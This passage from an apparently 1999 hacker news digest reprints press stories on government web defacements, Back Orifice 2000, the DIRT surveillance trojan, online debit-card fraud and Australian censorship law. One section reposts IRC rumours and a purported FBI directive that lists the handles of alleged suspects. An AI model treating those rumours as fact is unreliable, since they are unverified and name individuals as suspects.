deputy director of public affairs in Washington. Tomastik said the attack on the federal weather service forced its clients and customers to go to other sites for weather data. "It's weather data," he said. "There's no national security involved. I have no idea why they would go after it." Officials are still trying to determine what, if any, damage was done to the site by the intrusion. So far, they know that some "real minor goofing with the text occurred," but nothing major, Tomastik said. Yesterday, the U.S. Army Web site was breached (see story) and the home page defaced. Tomastik said the NOAA is evaluating its system and expects federal authorities to look into what happened. The site is expected to be back up later today. @HWA 27.0 Back Orifice 2000 is on its Way ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by RickDogg Set to be released on July 10th at Defcon, Back Orifice 2000 is already making news. The new version of Back Orifice will run on NT, be much harder to detect and have a very robust plugin architecture. Wired Back Orifice 2000 Wired; Coming Soon: Back Orifice 2000 by Niall McKay 3:00 a.m. 30.Jun.99.PDT An underground computer security group is poised to release a new version of a notorious software program that could allow crackers to watch and listen in on Windows-based PC users. The Cult of the Dead Cow said it will release Back Orifice 2000 on 9 July -- at the annual Def Con convention in Las Vegas. "This will demonstrate that Microsoft's operating systems are completely insecure and a bad choice for consumers and businesses who demand privacy," said Oxblood Ruffian, a former United Nations consultant and current Cult of the Dead Cow spokesman. See also: Back Orifice a Pain in the ...? Def Con is perhaps the most unusual gathering in the computer security field. Hackers, crackers, and self-proclaimed security experts will mingle with media, security professionals, federal law enforcement officers, and "script kiddies" who deface Web pages with prefab cracking code. Security groups of all stripes use the occasion to release software and show off gadgets. But Back Orifice 2000 is perhaps the most anticipated item. Unlike previous versions of the software, Back Orifice 2000 will run on Windows NT and feature strong encryption and a modular architecture that the group said will allow hackers and other security groups to write plug-ins. The program will be released as open source to encourage further development by the security community. Back Orifice, released at last year's Def Con, may allow malicious users to monitor and tamper with computers without the permission or knowledge of their owners. The program is classified as a Trojan Horse because crackers need to dupe the user into installing an application on their hard disk. Despite this, Oxblood Ruffian said that the program is currently installed on up to a half-million PCs worldwide. Though that number could not be independently verified, an Australian computer security group last November said that 1,400 Australian Internet accounts have been compromised by Back Orifice. Back Orifice 2000 also promises to be a great deal more difficult to detect than its predecessor because it enables users to configure its port setting. Previously, intrusion detection and antivirus programs could detect Back Orifice because it used a default port setting of 3113. (Er that should read 31337 -Ed) A Microsoft Windows NT Server security manager said the company is closely monitoring Back Orifice development and is working with antivirus and intrusion detection software vendors to provide customers with utilities to combat the software. "Trojan Horses are not technological issues but a social engineering problem because they rely on the ability of the cracker to trick the user into running an application," said Scott Culp. "It's just a fact of computer science that if you run a piece of code on your machine you run the risk making your system vulnerable." The solution, according to Culp, is to ensure that users do not install any software from untrusted sources and regularly update antivirus and intrusion detection programs. Also at the show, independent security consulting firm L0pht Heavy Industries will release Anti-Sniffer, a network monitoring tool, and will announce B00te Call, a PalmPilot War Dialer. Such programs will automatically dial telephone numbers in sequence, looking for modems. Zero-Knowledge Systems is also expected to provide further details about Freedom, a network of servers promising total online anonymity. Def Con will also feature some of its legendary sideshow attractions, such as the Spot the Fed contest. In this game, conference attendees are invited to point out suspicious attendees who may be working for federal law enforcement agencies. Winners will be awarded an "I spotted the Fed" T-shirt. Other diversions include a fancy dress ball, Hacker Jeopardy, and the Hacker Death Match, a game that enables hackers to take their flame mails out of cyberspace and into reality by dressing up in giant inflatable Sumo suits to do battle. Well-heeled attendees are invited to a US$100 outing to Cirque du Soleil. Meanwhile, the conference will include sessions on how to detect wiretaps; the art and science of enemy profiling; hacking ethics, morality, and patriotism; cyber-forensic analysis; and a talk on the practice of hiring hackers as security consultants. @HWA 28.0 Support for Web Security Spec Announced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by RickDogg Microsoft and HP have announced their support for the HTTP/1.1 Message Digest Authentication specification. This new specification published by the Internet Engineering Task Force last month proposes the use of MD5 instead of SSL for password traffic. ZD Net,4586,408287,00.html @HWA 29.0 Pentagon Investigates Computer Security Breech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by RickDogg An employee of the Defense Threat Reduction Agency is under investigation by the Air Force Office of Special Investigations for allegedly seeking unauthorized access to the computer system of a coworker. Evidently the employee requested access to a senior official's computer while the official was away. The request was denied and no access was gained. San Jose Mercury News Posted at 9:22 a.m. PDT Tuesday, June 29, 1999 Defense employee faces probe over computer incident WASHINGTON (AP) -- The Pentagon said today it is investigating an attempted computer security breach last week at a defense agency responsible for reviewing sensitive technology exports. An unidentified employee of the Defense Threat Reduction Agency is under investigation for allegedly seeking unauthorized access to the computer system of a coworker, agency spokesman Clem Gaines said. Gaines said the employee under investigation by the Air Force Office of Special Investigations had requested access to the government computer used by Peter Leitner, a senior advisor to the defense agency on matters involving exports of sensitive technologies. Gaines declined to identify the individual. The individual's request for use of Leitner's computer was denied and there was no security breach, Gaines said. The unauthorized request for access to Leitner's computer was made June 24, while Leitner was on Capitol Hill testifying before the House Committee on Government Reform, Gaines said. Leitner has rankled some in the Pentagon by charging that senior defense officials have glossed over concerns in the lower ranks that U.S. businesses were allowed to sell China and other countries technology with military applications. Gaines, the agency spokesman, said he could not discuss any details of the computer security investigation, which was requested Monday by the agency's director, Jay Davis. Pending the outcome of the investigation, the individual has been temporarily assigned to other duties, which Gaines did not specify. @HWA 30.0 What will the Next Generation of Viruses Bring? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by Deepquest Melissa and WormExplorer were devastating to business and governments world wide. As viruses get more sophisticated and virus writers get more creative what sort of viruses can the world expect to see in the next six months or a year? BBC Sci/Tech New virus spills your beans Virus threatens document security A new strain of computer virus could distribute your highly confidential documents all over the Internet. Anti-virus developers are warning that they cannot develop an antidote until the virus appears. Far from destroying vital files, the virus will make sure everyone can see them. The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have cost businesses millions in recent weeks. Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer the virus sends a message to everyone in the victim's in-box and then destroys every file written in Microsoft Word, Excel or Powerpoint, among others. New virus on the block One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's address book. It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password files and address lists to Internet Relay Chat channels. Anti-virus developers are expecting the next step to be a virus which roots around in your files and then posts your documents across the Internet. "The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list, or it could be a highly sensitive company document. "What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus. Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future variants until they encounter them. Java and ActiveX - next infection target It is predicted that the next generation of viral infections will hit small Webpage programmes called applets, written in Java and ActiveX. A recent survey revealed that more than half of medium-sized organisations using an intranet had no security policy in place to respond to the threat of attacks on Java applets. Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn this year alone. The viruses cannot infect Macintosh or Unix systems. @HWA 31.0 DIRT still Around, Used by LAw Enforcement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by wannabe We have all heard of BO (Back Orifice) or NetBus but what about DIRT? DIRT stands for Data Interception by Remote Transmission and is a commercial software package only available to law enforcement officials. DIRT, like BO and NetBus, allows remote control of a PC with or without the user's knowledge. Unfortunately this article makes no mention of whether it is necessary for law enforcement to get a search warrant before they use such a tool. PC World"/article/0,1510,11614,00.html Correction 1615EST Evidently the above story does mention that a search warrant is needed before law enforcement can use this tool. Unfortunately we missed that information. The story does mention that Frank Jones think that the Cult of the Dead Cow stole the idea for Back Orifice after seeing a DIRT demo. We have recieved staunch denials of this accusation from several members of cDc. PC World; Getting DIRT on the Bad Guys Here's the ultimate weapon in the war against cyber crime. by Tom Spring, PC World June 29, 1999, 12:23 p.m. PT To former detective Frank Jones, "secure network" is an oxymoron. The word "delete" isn't in his vocabulary. Password-protect your computer and you'll make his day. And if you really get on Jones' bad side, he'll take complete control of your PC--and your first clue will be when you open your door and the boys in overcoats start flashing badges at you. If you're among the anonymous thousands of cyber bad guys who inhabit the Internet's underbelly, Jones is your worst nightmare. The retired New York City detective works on the law enforcement sidelines building software tools to help the government and police crack down on online criminals. And his latest tool is considered the ultimate weapon. Digging up DIRT Jones wrote the widely used, but little-known software program called DIRT. The program works like a telephone wiretap for computers, giving its users the ability to monitor and intercept data from any Windows PC in the world. DIRT stands for Data Interception by Remote Transmission and was originally created by Jones as a tool to help snare online child pornographers. But in the short time it has been available only to government and law enforcement agencies, DIRT is now used to battle hacker groups like Cult of the Dead Cow and to trap terrorists, drug dealers, money launderers, and spies. "What we do is give law enforcement an additional line of defense," says Jones, the president of Codex Data Systems. The DIRTy Details The client side version of the DIRT program is less than 20KB in size and is typically installed on a target PC using a Trojan horse program (a set of instructions hidden inside a legitimate program). The DIRT program is usually sneaked inside an e-mail attachment, a macro, or a workable program that a targeted user is enticed to download. Once inside a target Windows 95/98/NT computer, it gives law enforcement complete control of the system without the user's knowledge. It starts off by secretly recording every keystroke the user makes. The next time the user goes online, DIRT transmits the log for analysis. Jones says government agencies have even managed to open encrypted files by obtaining password locks. During a recent program demonstration, Jones easily uploaded and downloaded files to a DIRT-infected computer connected to the Net by a dial-up modem. Jones could upload and download files to the PC without a hint of activity on the other end. Arresting Developments If you think this sounds like B-grade fiction, it isn't. During a recent meeting of high-ranking federal and state gumshoes, DIRT received glowing software reviews. Many cited long lists of arrests thanks to Codex. One police detective said DIRT has become a powerful tool in fighting crime online. It aids criminal investigations and results in about one arrest each month. Most of those arrested were suspected pedophiles, he said. The hardest part of using DIRT, say its users, is getting owners of targeted computers to download the Trojan horse programs. Typically law enforcement tries to entice a targeted individual to download a program or a compressed file that must be "un-zipped" which contains the DIRT bug inside. Because the program is not available to the public, DIRT is undetectable using virus scanning software, Jones said. "The only way to avoid DIRT is to ignore your e-mail," he says. Fighting Fire With Fire Jones says law enforcement desperately needs these tools to turn the tide in its battle against online crime. "Law enforcement is outgunned," he says. In an age where hacking horror stories have become front-page news, DIRT gives law enforcement an effective tool to even the score and catch the bad guy. On one recent occasion DIRT was used to track a suspected drug dealer as he zigzagged across the country from client to client selling methamphetamines. His big mistake, police say, was keeping a client list on his laptop and logging into the Net each night to stay in touch with business associates and friends. Using DIRT, police tracked his whereabouts each night and took notes on who his associates were. The alleged drug dealer was eventually arrested as he was surfing the Net in a San Jose, California motel room. A Form of Flattery? Though DIRT is restricted to military, government, and law enforcement agencies, the "Back Orifice" hacker tool offers some similar tricks. Jones maintains that its inventor, a member of the hacking group Cult of the Dead Cow, attended Codex's first public demonstration of DIRT more than a year ago and slapped together an "imitation" of DIRT based on what he saw. "Close, but no cigar," Jones says. But according to Mike Hudack, editor of, an online magazine for hackers, there's more to Back Orifice than that. An updated version called "Back Orifice 2000" is expected to hit the Web in July. Big Brotherware? Hudack says the technological Cold War between white-hat hackers and black-hat hackers is just beginning--and law enforcement needs all the help it can get. But others view DIRT as a potential threat to privacy, raising serious legal and ethical questions as a means of gathering information. To use DIRT law enforcement agencies must first obtain a wiretap search warrant. But privacy groups maintain that this type of electronic surveillance goes far beyond wiretap warrants because DIRT allows authorities to invisibly snoop inside a targeted PC's entire hard drive --not just monitor electronic communications. "Throughout history law enforcement has had a long track record of overstepping its bounds when it comes to search warrants," says Shari Steele, director of legal services for Electronic Freedom Foundation, the privacy rights group. Unless appropriate checks and balances are in place, Steele says, DIRT can quickly go from being an effective crime-fighting tool to a privacy activist's worst nightmare. The American Civil Liberties Union takes a harder stance. "Clandestine searches like these are the worst kind," says Barry Steinhardt, associate director of the ACLU. "This is exactly the kind of search the Fourth Amendment is designed to protect us from." @HWA 32.0 Debit Cards Not Safe on the Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by mortel Illustrating the problem of debit card use on the Internet Don Garlock, a consultant for the Bedford County Sheriff's Department in Bedford, VA describes his search for the people who wiped out his bank account. MSNBC The dark side of online shopping Trail of fraud leads from to Thailand By Molly Masland MSNBC June 24 When Internet investigator Don Garlocks bank account was mysteriously cleaned out in early June, the last thing he expected was that the search for the culprit would take him on a shadowy trail through cyberspace. The clues began at online retail giant and led to a ring of alleged hackers in Bangkok, Thailand. Along the way, Garlock picked up crucial lessons about the perils of online shopping, even at sites that claim to be "100 percent safe." A CONSULTANT for the Bedford County Sheriffs Department in Bedford, Va., Garlock works for Operation Blue Ridge Thunder, a program aimed at stopping crimes against children on the Internet. Garlock has logged hundreds of hours hunting down pedophiles and child pornographers online. So when his personal bank account was suddenly emptied in early June, Garlock put his online tracking skills to the test. But even he was surprised by what he discovered. FRAUDULENT CHARGES AT AMAZON According to Mainstreet Bank Group, Garlocks bank, someone had purchased nearly $1,400 worth of merchandise at and charged it to his debit card account. When the mysterious charges at appeared, Garlock immediately suspected fraud and called the online retailer of books and music to find out who was responsible. But Garlock was astonished to find that would not release any information to him about his account. A customer of several years, Garlock had placed modest orders in the past, spending a total of $160, and had never had an unpleasant shopping experience at the online retailers site. But would neither release the name of the individual who had purchased the goods using his debit card number nor tell Garlock what specific merchandise had been bought or where it had been shipped. spokesman Paul Capelli said the company makes it a policy to release detailed information about an account only to a customers bank, which can then release the details to their client. We want to take reasonable steps to protect our customers privacy, said Capelli. We need to know were dealing with the real customer, not someone calling on the phone who could be anyone. As a result, the only information Garlock received directly was a hint accidentally leaked over the phone by a customer service representative. They let slip the first half of the e-mail address, and then they realized what they had done and put me on hold. They came back and read me a prepared response to the effect that they could not divulge any additional information to me, said Garlock. TRAIL TO THAILAND Frustrated, Garlock was determined to proceed with his own investigation. While his bank began an official inquiry into the case with, Garlock went to work. Using the limited information he had obtained from, he uncovered a path of clues leading to a ring of alleged computer hackers in Bangkok, Thailand. The first part of the e-mail address given to him contained an unusual word and turned out to be what is a very common first name in that part of the world, he said. Garlock was able to uncover a wealth of personal information about the individuals who had used his card.With the help of ordinary search engines, he uncovered their home addresses, phone numbers and where they attended college. Garlock also found that in addition to having multiple e-mail addresses and Web sites touting their hacking skills, the alleged thieves held legitimate Web development jobs. We know a tremendous amount of personal, professional and business-type information on these people now from our investigations here in little old Bedford County, said Sheriff Michael Brown. Eventually released the shipping address and fraudulent e-mail address used by the credit card thieves to Garlocks bank, but by then the information only confirmed the data he had already uncovered. Because the sheriffs office has no jurisdiction in Thailand, the department turned the case over to Interpol, the international crime investigation agency that works with federal law enforcement agencies and national police forces. Garlocks case is under review and, according to Brown, will most likely be turned over to the FBI, U.S. Customs or the Secret Service. MORE CASES OF FRAUD From the time there has been credit cards, there has been credit card fraud. Bad things can happen any place and the Internet is no different. PAUL CAPELLI spokesman In an e-mail sent to Garlock, Amazon.coms investigations department confirmed that the charges made to his debit card were indeed the result of unauthorized use. Mainstreet Bank Group said an investigations officer at admitted that the same group in Thailand had set up a number of other stolen credit card numbers for use at the retailers site. In a memo obtained by MSNBC, Shirley Schoefield, a bank investigations officer at Mainstreet Bank Group, said that according to the investigations department at Amazon, approximately 20 cards have been set up for use to purchase merchandise to be sent to the following shipping address (in Thailand). Citing customer privacy restrictions, Schoefield refused to comment on the case. Amazon.coms Capelli also refused to comment on the case of the 20 fraudulent credit cards, but acknowledged that there have been instances of credit card misuse at the site. From the time there has been credit cards, there has been credit card fraud. Bad things can happen any place, and the Internet is no different. Any retailer encounters this problem, he said. However, he insisted that Amazon.coms security system had never been compromised. Currently is advertising for positions in its fraud investigation department. Under the section employment opportunities on its Web site, is looking for a fraud detection specialist as well as a fraud detection manager. DONT USE A DEBIT CARD Garlocks situation was made worse by the fact that his debit card number was stolen instead of a credit card. If his credit card had been used fraudulently, according to federal regulations, he could have easily stopped payment on the account and would have been held responsible for no more than $50. But since his debit card was stolen, he temporarily lost everything in his checking account. When a debit card is used, the money is automatically removed from the account when the order is processed. While the bank is still responsible for paying Garlock back, he must wait until the official investigation is complete, a process that can take weeks and sometimes months. One of the biggest lessons Ive learned from this is, for Gods sake, dont use a debit card on the Internet, said Garlock. has a policy of fully refunding unauthorized charges billed to a customers account and has agreed to pay back Garlock any amount billed to his account that is not covered by his bank. HACKER AND/OR THIEF? While it is clear that Garlocks debit card number was stolen and used illegally, what remains unknown is whether the thieves first obtained the number by breaking into Amazon.coms site, or whether the numbers were obtained from another source or even generated randomly. Amazon.coms Capelli said that hackers have never broken into the companys site or stolen information on individual accounts. Our system of storing credit card information has not been compromised, nor has it ever been compromised in any way. Any claims to this effect are not true absolutely not true, said Capelli. According to Inspector Earl Wismer of the San Francisco Police Department, which handles many cases of Internet fraud, Its really difficult to pin down where exactly a credit card number was acquired. It is common for credit card numbers to be fraudulently used on the Web, but were not able to determine whether the numbers were obtained from the Web or from some other source. In addition to stealing credit card numbers the old-fashioned way, such as acquiring the number from receipts, there are several sites on the Web where hackers, or anyone else whos interested, can generate legitimate credit card numbers based on algorithms, or mathematical formulas, used by banks. The algorithms generate all the numbers used by a given bank, but the hacker must then systematically try out each number in an effort to find one that is in current use and still has an available credit limit. CROSS CHECKS NEEDED Garlocks case is worrisome because no matter how his debit card number was acquired, the user was still able to charge a hefty amount of merchandise to a debit card account owned by a person living in the Blue Ridge Mountains of Virginia and have it shipped to an address in Bangkok without any alarm bells going off at Apparently their order confirmation system that would match a card number to a given individual is seriously flawed, said Garlock. According to Capelli, the person who fraudulently used Garlocks debit card set up a separate account using the card number, but did not break into Garlocks existing account. Capelli dismissed the need for a more thorough cross check of credit card numbers with existing account information adding that it is very common to have more than one account per card number. For instance, there are husbands and wives with different names who have different accounts but use the same card number. Or parents who let their children use their credit card number to set up an account. As Scambusters, an online consumer advocacy organization, points out, the reality is that its actually much safer to enter a credit card number on a secure online order form than it is to give a credit card to a waiter at a restaurant. But there are important security measures to be worked out before the process is 100 percent safe, despite what many online sites want customers to believe. "There is definitely a problem and I think some people in the industry have known that it is a problem. It is not one thats going to be fixed easily, said Sheriff Brown. Consumers have just got to be careful. @HWA 33.0 New Definition of 'Computer Hacker' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN contributed by mortel A woman in Grafton Ohio has redefined the term 'computer hacker'. Twenty nine year old Kelli Michetti, upset that her husband was spending too much time online took a meat cleaver and attacked the home computer. She was fined $200 for her actions. CBS News @HWA 34.0 Hackers In the Workplace ~~~~~~~~~~~~~~~~~~~~~~~~ July 1st From HNN contributed by Whoever Security companies claim that they do not hire hackers. In reality are they actually actively recuiting hackers? Are they doing this because they know that not only are they the most knowledgeable but also the most loyal and hard working? A new HNN exclusive Buffer Overflow article examines these questions and more. Buffer Overflow @HWA 35.0 NPR Covers .gov/.mil Defacements. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ July 2nd From HNN contributed by oolong In a rare moment of media impartiality, NPR's Morning Edition yesterday broadcast an article about the latest .gov breaking that featured an interview with Attrition staff. This interview properly puts the blame of the hacked pages on poor web server maintenance. This article is in Real Audio format. Kudos to Morning Edition for being fairly impartial, hopefully it will not be too much to ask other outlets to follow their example. NPR - print NPR - Real Audio " Hackers Strike Again Over the past month, there has been a rash of computer hacker attacks on government web sites including the White House, the FBI, and the Senate.Earlier this week they hit the Army's site and Wednesday the National Oceanic and Atmospheric Administration's Storm Prediction Center Web site was disabled. In some cases, the hackers were able to exploit computer systems that have not kept up to date with Internet security alerts. Hear more as NPR's John McChesney reports for Morning Edition. " 36.0 Australia Passes Major Net Censorship Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ July 2nd From HNN contributed by photon Australian Parliament has created one of the world's most far-reaching online censorship laws. The Broadcasting Services Amendment Act will institute a rating system for Internet content. The Australian Broadcasting Authority will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified. Opponents who failed to prevent the bills passing hope that the decentralized nature of the internet will prove to be uncontrollable by this new law. One loophole in the law is already being exploited, regulators forgot to include anonymous proxy services in the legislation. Wired MSNBC Broadcasting Services Amendment Act Australian Broadcasting Authority Wired; Australian Net Censor Law Passes by Stewart Taggart 8:15 a.m. 30.Jun.99.PDT CANBERRA, Australia -- The political leaders of this nation on Wednesday passed into law one of the world's most far-reaching online content censorship regimes. The rules -- which take effect 1 January, 2000 -- enable Australian government regulators to order domestic Internet service providers (ISPs) to take down indecent or offensive Web sites housed on their servers, and also require they block access to certain domestic or overseas-based content. "We're on fairly new ground here," said Stephen Nugent, special projects manager for the Australian Broadcasting Authority (ABA). "The codes of practice envisaged under this legislation are probably more detailed, and cover a greater range of matters, than I have seen in any other country." Known as the "Broadcasting Services Amendment (Online Services) Act", the measure was approved by the House of Representatives late Wednesday night, according to a staffer in the office of Communications Minister Richard Alston. The measure had passed the more contentious Australian Senate on 26 May. The new law will institute a movie-like rating system for Internet content. The ABA will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified. For opponents of online content restrictions, the struggle will now shift to cyberspace itself. They believe the Internet simply will prove too large, too decentralized, and too fast-moving for regulators anywhere to successfully block access to any content for long. Among the defiant is Perth-based online entrepreneur Bernadette Taylor. Known to her Web site admirers as a "Virtual Girlfriend," she offers nude photos of herself and personalized email communication to paying members. To Taylor, passage of the law merely begins a hide-and-seek game she professes little doubt she'll win. With a Web site housed in Dallas, Texas, she plans to stay one step ahead of the nation's blocking mechanisms for as long as the law lasts. "With a bit of effort the ABA could find (and block) me every day but they'd have to spend five to 10 minutes doing it," she says. "In the meantime, I'm compiling a mail list which has all the people that want notification of where I am." She believes her Australian-based users will encounter little ongoing difficulty accessing her site, either through using encryption software or through proxy servers that disguise the source of material. One such proxy server has been set up by South Australian Web site builder and e-commerce businessman Mike Russell. By visiting, Australian Web users will be able to access any site they want without disclosing where they're visiting. Since banning proxy servers isn't included in the legislation, Russell says there will be little Australian regulators can do. Among other defiant gestures, Russell is calling for a worldwide boycott by Web sites of visitors from "" domains -- recommending all such visitors be redirected by webmasters to the home page of Electronic Frontiers Australia, the online civil liberties group that spearheaded a failed effort to stop the law. In introducing the online content legislation, the center-right government of Prime Minister John Howard argued that some controls are needed to limit access by children to pornographic content on the Internet, as well as other material that could be deemed offensive.Passage of the law comes amid research showing Internet use is rising rapidly in Australia. Figures released Wednesday by the Australian Bureau of Statistics showed nearly 18 percent of Australia's households now have some form of Internet access -- a rise of nearly 50 percent in one year. Nearly 40 percent of Internet households in Australia now access the Internet on a daily basis, the researchers found. To Grant Bayley, a Sydney spokesman for 2600 Australia, an organization of technology enthusiasts, the fact that the law comes into force on 1 January, 2000 provides at least one indication that Australian lawmakers may not have been fully cognizant on all the issues involved. "January 1 is not going to be one of the best days in the world to implement this," he said, referring to the long-feared Year 2000 problem in which worldwide computers may start acting up due to the millennial date change. "There are going to be much bigger problems around," he said. @HWA 37.0 Hacker Crackdown, is your nick on this list?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Fbi releases hacker list -- saturday june 27 -- 11:00 sct The FBI has started an all-out war on hackers and the like, they have received monetary funds from the government and are monitoring many servers, there is a possiblity they are monitoring a few EFnet servers, but other than that agents go online posed as regular people. They also are monitoring DALnet and are considering going on UnderNet next. Watch your backs. With the funding, the FBI has invested in much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000, and they are targeting many young people in groups. Their tactic with young people is to scare them with lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal prison?" So groups, watch your little ones. check the list out below IRC Server: Channel #crackdown ---------------------------------------------------------------------------- The FBI has started an all-out war on hackers and the like, they have received monetary funds fron the government and are monitoring many servers, there is a possiblity they are monitoring a few EFnet servers, but other than that agents go online posed as regular people. They also are monitoring DALnet and are considering going on UnderNet next. Watch your backs. With the funding, the FBI has invested in much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000, and they are targeting many young people in groups. Their tactic with young people is to scare them with lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal prison?" So groups, watch your little ones. ---------------------------------------------------------------------------- AntiOnline Receives Directives Thursday, May 27, 1999 at 11:59:27 by John Vranesevich - Founder of AntiOnline AntiOnline has recieved directives given to several ISPs listing the groups of hackers and hackgroups that they're currently targeting. Sources faxed AntiOnline the 6 page directive which begins: You are hereby requested to preserve, under provisions of Title 18, United States Code, Section 2703(a)(unopened e-mail), (b)(content),(c)(logs and records), and (f)the following records in your custody and control, including records stored on backup media: The request then goes on for 6 pages listing hacker, groups, and media currently under investigation by the FBI. The list contains not only the hacker's handles, but in most cases, their real names. For the privacy of those involved, AntiOnline is only publishing their aliases. Here is a partial list of the individuals on that list: Sate mz_chick epoh Anacarda kimmie badfrog Becky iCBM rox Code0 Codex Sygma Cyberfire DigitalX Ibanez Spaceg0at Downfall Duk0r elf solarix VectorX f00t f0nz ganja Vie IO Cl0pz Bladex vallah jenna coolio hamster prym tr0n lure LD shortee LongDistance lothos blackhappy darkfaery crazygyrl Diesl0w blanc 09 Acidkill Phear nonlinea optic Overdose P0rt MostHated fryz hyrid ghost Rizzy prophet shdwknght sidney status taylor Texan Borgie d0lz timebomb Blakforge Type-0 watchy wolf303 wookie Yorph random totempole cyberf|re jos Mcintyre Eckis Twisted-- Pantera angelo espionage fenderkev ne0h digital- ID-50 taylor cult_hero socked problem mal_vu minos series ben-z rslink- judy The directive goes on to request information to: Directories, files, logs, records, information or any data concearning IRC Channels visited by Hackers or individuals listed in paragraph 1, specifically: It goes on to list the following IRC Channels: #creep #j00nix #tk #pascal #ex0dus #faggotsex #gayfagsex #gaysex #hackunix #hax0r #lezbiandsex #linux #sex_gay #sex_pl #shellx.log Section 5 of the directive requests: Directories, files, programs, logs, or data concearning the Names of hacker groups: This section goes on to list: GlobalHell gH milw0rm Total-ka0s tk Darkcyde D4rkcyde 2600 world domination enforcers enphorcers hackphreak Section 7 requests: Victim names or known victim identifying numbers, such as names, addresses, and teleophone numbers, concerning the Individuals listed in paragraph 1, or listed below: Section 7 goes on to list: Meeting Place At&T Latitude Sprint MCI GTE Alltell Steve Huron Josh Teplow 1-800- 1-888- DCCCD LCET Walburg Dillon Reed 3-com 3com As ALWAYS, AntiOnline will bring you the latest information as it becomes available. IRC Server: Channel #crackdown ---------------------------------------------------------------------------- FBI lurking on IRC May, 30 1999 - 22:07 contributed by: BinaryZer0 >From an unidentified source, I, and others, have been told to keep quiet on IRC's EFnet, especially the servers. Why? It is possible that the FBI received cooperation from officials, and the FBI is now sniffing the server. It is possible that they are sniffing out words like "hack" with a similar type of contraction as "grep". This is due to the recent hacks of government sites, and the envolvement of gH members (who hang out on EFnet). Further details will, somehow, be investigated. IRC Server: Channel #crackdown ---------------------------------------------------------------------------- As I have been told, a few people were raided a few weeks back: Becky- fryz MostHated Nothing really has been pinned on them. More can be discussed on the IRC server,, port 6667 in channel #crackdown. -missnglnk @HWA -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=- T E R M U M L H U O R I L -=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=- Rumours: ~~~~~~~ Send rumours to, or join our irc channel and gossip!! tnx .. + has had a facelift, check out the new look and leave your comments to astral on how you like it... + Help! net-security is changing servers and may be down for a few days while they overcome some new server teething problems (probably dns related).see elsewhere this issue for more details ... + HNN: contributed by Space Rogue, HNN hopes everyone has a fun filled Fourth of July weekend. Note, that there will be no news update on Monday. Be sure to check in next week as we attempt to update the site remotely from Defcon7 in LasVegas. We should be ready to announce the HNN T-shirts that everyone has been asking for on Tuesday. Oh, and SETI@Home released version 1.5 of the SETI software last Wednesday which fixes quite a few bugs. (with all the news lately we forgot to mention it). Be sure to join up with the HNN team as you search for that Aranakin guy. HNN Team for SETI@Home AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.freekevi m www.freeke www.kev# Support and the Free Kevin www.kevinmitnick. com defense fund site, visit it now! . # www.k# FREE KEVIN! www.kevinmitnic www.2600.########################################om www.fre www.kevinmitnic www.fre One of our sponsers, visit them now * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. From ... JP offers a public personal insite to his family Contributed by mkatona Tuesday - March 02, 1999. 05:09PM UTC In an off the wall media report, AntiOnlines owner, JP, reveals personal information to the world: 